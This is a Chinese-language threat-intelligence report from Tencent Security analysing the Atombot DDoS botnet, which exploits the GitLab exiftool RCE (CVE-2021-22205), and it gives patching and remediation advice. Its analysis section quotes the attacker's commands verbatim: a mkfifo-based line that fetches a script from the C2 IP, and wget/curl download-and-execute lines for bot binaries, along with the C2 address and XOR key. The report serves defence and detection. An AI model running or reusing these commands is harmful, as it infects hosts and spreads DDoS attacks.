• 产品中心

    产品中心

    • 基础安全

      T-Sec 主机安全

      容器安全服务 TCSS

      T-Sec Web应用防火墙

      T-Sec 云防火墙

      T-Sec 安全运营中心

      T-Sec iOA零信任安全管理系统

    • 业务安全

      T-Sec 天御 验证码

      T-Sec 天御 文本内容安全

      T-Sec 天御 视频内容安全

      T-Sec 全栈式风控引擎

      T-Sec 手游安全

      T-Sec 小程序安全

      T-Sec 应用合规平台

    • 数据安全

      T-Sec 堡垒机

      T-Sec 数据安全审计

      T-Sec 云访问安全代理

      T-Sec 凭据管理系统

      T-Sec 密钥管理系统

      T-Sec 云加密机

      T-Sec 数据安全治理中心

    • 安全服务

      T-Sec 安全专家服务

      一站式等保服务

      T-Sec 安全托管服务

      渗透测试服务

      应急响应服务

      重要时期安全保障服务

      安全攻防对抗服务

    了解全部安全产品

  • 解决方案

    解决方案

    • 通用解决方案

      等保合规安全解决方案

      直播安全解决方案

      数据安全解决方案

      品牌保护解决方案

      高防云主机安全解决方案

      腾讯安心平台解决方案

    • 行业场景方案

      游戏安全场景方案

      电商安全场景方案

      智慧零售场景方案

      智慧出行场景方案

    • 安全专项解决方案

      勒索病毒专项解决方案

      重大保障安全解决方案

  • 更多

    更多

    • 关于我们

      腾讯安全介绍

      荣誉认证

    • 帮助中心

      帮助文档

    • 考试认证

      在线课堂

      证书查询

    • 联系我们

      产品方案咨询

      寻求市场合作

    • 友情链接

      腾讯云

威胁研究正文

警惕:DDOS僵尸网络Atombot正攻击云主机

2022-06-02 01:57:59

腾讯安全威胁情报中心检测到,有攻击者使用Gitlab exiftool 远程命令执行漏洞(CVE-2021-22205)对云主机展开攻击,若攻击成功会投递DDoS僵尸木马并连接C2,可控制肉鸡对互联网上的其他设备发起DDoS攻击,因其木马样本中硬编码了字符串“Atom_bot”,我们将其命名为Atombot僵尸网络。

一、概述

腾讯安全威胁情报中心检测到,有攻击者使用Gitlab exiftool 远程命令执行漏洞(CVE-2021-22205)对云主机展开攻击,若攻击成功会投递DDoS僵尸木马并连接C2,可控制肉鸡对互联网上的其他设备发起DDoS攻击,因其木马样本中硬编码了字符串“Atom_bot”,我们将其命名为Atombot僵尸网络。


Gitlab exiftool 远程命令执行漏洞(CVE-2021-22205),未正确验证传递到GitLab文件解析器的图像文件可导致远程代码执行。由于 Gitlab 某些端点路径无需授权,攻击者可在无需认证的情况下利用图片上传功能执行任意代码。


Gitlab exiftool 远程命令执行漏洞是2021年4月披露并已修复的高危漏洞,CVSS评分为10(最高分),该漏洞一经出现,就得到众多网络黑产青睐,成为最常用的攻击武器之一。


腾讯安全专家强烈建议受影响的用户将GitLab升级到最新版本。下载链接:https://about.gitlab.com/update/


腾讯安全旗下安全产品已支持全面检测防御该漏洞的攻击利用:

  • 腾讯T-Sec漏洞扫描服务、腾讯T-Sec主机安全(云镜)、腾讯容器安全服务(TCSS)已支持检测企业资产(主机、容器及镜像)是否存在Gitlab ExifTool远程命令执行漏洞(CVE-2021-22205);

  • 腾讯T-Sec高级威胁检测系统(NTA,御界)、腾讯T-Sec 云防火墙、腾讯T-Sec Web应用防火墙(WAF)均已支持检测、拦截利用GitLab ExifTool远程代码执行漏洞的攻击活动;

  • 腾讯T-Sec主机安全(云镜)已支持对Atombot相关僵尸网络木马样本的查杀清除。

二、分析

Atombot利用Gitlab exiftool漏洞攻击成功后执行脚本bins.sh: 

sh -c TF=$(mktemp -u);mkfifo $TF && rm -rf bins.sh; rm -rf x86; rm -rf *.x86; wget http[:]//179.61.251.10/bins.sh; chmod 777 *; sh bins.sh 0<$TF | sh 1>$TF


脚本下载包括针对x86、mips、arm等CPU架构的样本:

cd /tmp; wget http[:]//179.61.251.10/bins/flow.arm7; curl http[:]//179.61.251.10/bins/flow.arm7 -O flow.arm7; chmod 777 flow.arm7; ./flow.arm7 exploit

cd /tmp; wget http[:]//179.61.251.10/bins/flow.arm6; curl http[:]//179.61.251.10/bins/flow.arm6 -O flow.arm6; chmod 777 flow.arm6; ./flow.arm6 exploit

cd /tmp; wget http[:]//179.61.251.10/bins/flow.arm5; curl http[:]//179.61.251.10/bins/flow.arm5 -O flow.arm5; chmod 777 flow.arm5; ./flow.arm5 exploit

cd /tmp; wget http[:]//179.61.251.10/bins/flow.arm; curl http[:]//179.61.251.10/bins/flow.arm -O flow.arm; chmod 777 flow.arm; ./flow.arm exploit

cd /tmp; wget http[:]//179.61.251.10/bins/flow.x86; curl http[:]//179.61.251.10/bins/flow.x86 -O flow.x86; chmod 777 flow.x86; ./flow.x86 exploit

cd /tmp; wget http[:]//179.61.251.10/bins/flow.mips; curl http[:]//179.61.251.10/bins/flow.mips -O flow.mips; chmod 777 flow.mips; ./flow.mips exploit

cd /tmp; wget http[:]//179.61.251.10/bins/flow.mpsl; curl http[:]//179.61.251.10/bins/flow.mpsl -O flow.mpsl; chmod 777 flow.mpsl; ./flow.mpsl exploit

cd /tmp; wget http[:]//179.61.251.10/bins/flow.spc; curl http[:]//179.61.251.10/bins/flow.spc -O flow.spc; chmod 777 flow.spc; ./flow.spc exploit

cd /tmp; wget http[:]//179.61.251.10/bins/flow.sh4; curl http[:]//179.61.251.10/bins/flow.sh4 -O flow.sh4; chmod 777 flow.sh4; ./flow.sh4 exploit

cd /tmp; wget http[:]//179.61.251.10/bins/flow.m68k; curl http[:]//179.61.251.10/bins/flow.m68k -O flow.m68k; chmod 777 flow.m68k; ./flow.m68k exploit


以flow.x86为例进行分析,样本除了“Atom_bot”外,其余关键字符串均被加密。

{xunruicms_img_title} 


启动后会先检查有无参数,没有参数直接退出。然后将内置的加密数据依次与0d f0 ad ba进行异或得到解密后的字符串。

{xunruicms_img_title}


{xunruicms_img_title} 


解密并打印字符“aisu_bot[Killing”,然后使用随机字符串隐藏进程名。

{xunruicms_img_title}


读取硬编码在代码中的IP地址和端口作为C2连接,C2地址为179.61.251.10:420。

{xunruicms_img_title}


{xunruicms_img_title} 


通过调用Linux系统第102号(0x66)syscall进入socketcall(),并且通过参数3定位执行conncet网络连接函数。

{xunruicms_img_title} 

Linux系统调用表:

{xunruicms_img_title}


系统调用入口socketcall()中不同参数对应不同的系统函数,木马通过调用sys_socket,sys_connect,sys_getsockname,sys_send,sys_recv等函数实现与C2地址的网络通信。

{xunruicms_img_title}


连接成功后,被控端首先发送4个字节上线请求,然后发送8个字节的参数” .exploit”,控制端返回数据后,解密出命令并退出进程或执行DDoS攻击等操作。

{xunruicms_img_title} 


{xunruicms_img_title}


木马向控制端发送和返回心跳包:

{xunruicms_img_title} 


三、安全建议及处置手册

腾讯安全专家建议企业用户参考以下方法排查风险,消除威胁。

1.通过腾讯主机安全(云镜)扫描排查主机是否存在流行高危漏洞,及时根据提示信息修复相关漏洞;


主机安全(云镜)控制台:打开漏洞管理->Web应用漏洞管理,点击一键检测

{xunruicms_img_title}


查看扫描到的Gitlab exiftool 远程命令执行漏洞(CVE-2021-22205)风险项目。


确认存在Gitlab exiftool 远程命令执行漏洞(CVE-2021-22205)的资产IP。运维人员登录该资产,将Gitlab升级到最新版本。


回到腾讯主机安全(云镜)控制台再次打开“漏洞管理”,重新检测,确保已修复漏洞的资产IP已不再被检测到。


2.配置腾讯云防火墙对恶意利用Gitlab exiftool 远程命令执行漏洞(CVE-2021-22205)的攻击进行防御:


在腾讯云防火墙控制台界面,打开入侵防御设置即可。

{xunruicms_img_title}


3.建议配置使用强密码进行登陆验证,不使用弱密码或默认密码。

推荐通过腾讯云防火墙配置微信扫码登录主机,避免因操作人员帐号密码泄露导致黑客远程登录,或遭遇弱密码爆破攻击;


详细操作步骤可参考“腾讯云防火墙运维实例:远程登录”(https://cloud.tencent.com/document/product/1132/53012)

{xunruicms_img_title} 


4.检测发现感染僵尸木马程序后,及时清除恶意样本,以彻底消除威胁。


通过腾讯主机安全(云镜)控制台,入侵检测->文件查杀,检测全网资产,在资产列表右侧输入资产IP地址,检测恶意文件,发现后一键隔离操作。操作步骤:


A: 主机安全(云镜)控制台:入侵检测->文件查杀,选择一键检测:

{xunruicms_img_title} 

B:弹出一键检测设置,选择快速扫描,勾选“全部专业版主机”,开启扫描:

{xunruicms_img_title} 


C:查看扫描出的木马风险结果项

{xunruicms_img_title} 


{xunruicms_img_title}


D:对Atombot僵尸网络木马进行一键隔离(注意勾选隔离同时结束木马进程选项)

{xunruicms_img_title}


IOCs

MD5

99e95e15ed161cf4a5ff8167de5f495f

89b0666a5656ab7407a67e5af8cf9b6f

e55082237c555b2f3f1cc55eca27a8fe

6dca32a8ce6f0dc667c39c299714680b

a04e168cd4523b2aaf2271cccfdc5597


参考链接:

https://mp.weixin.qq.com/s/Xzz_3VYFGi7hFHBplOOLZQ


https://cocomelonc.github.io/tutorial/2021/10/17/linux-shellcoding-2.html


扫描以下二维码关注“腾讯安全威胁情报中心”公众号,掌握最新的网络安全威胁情报。

  • 产品方案

    • 产品中心

  • 威胁研究

    • 威胁通告
    • 研究报告

  • 合作伙伴

    • 合作伙伴详情

  • 其他

    • 腾讯安全介绍
    • 新闻活动
    • 在线课堂

  • 友情链接

    • 腾讯云

腾讯安全公众号

腾讯安全视频中心

Copyright©1998-2024 Tencent. All Rights Reserved.

在线咨询

方案定制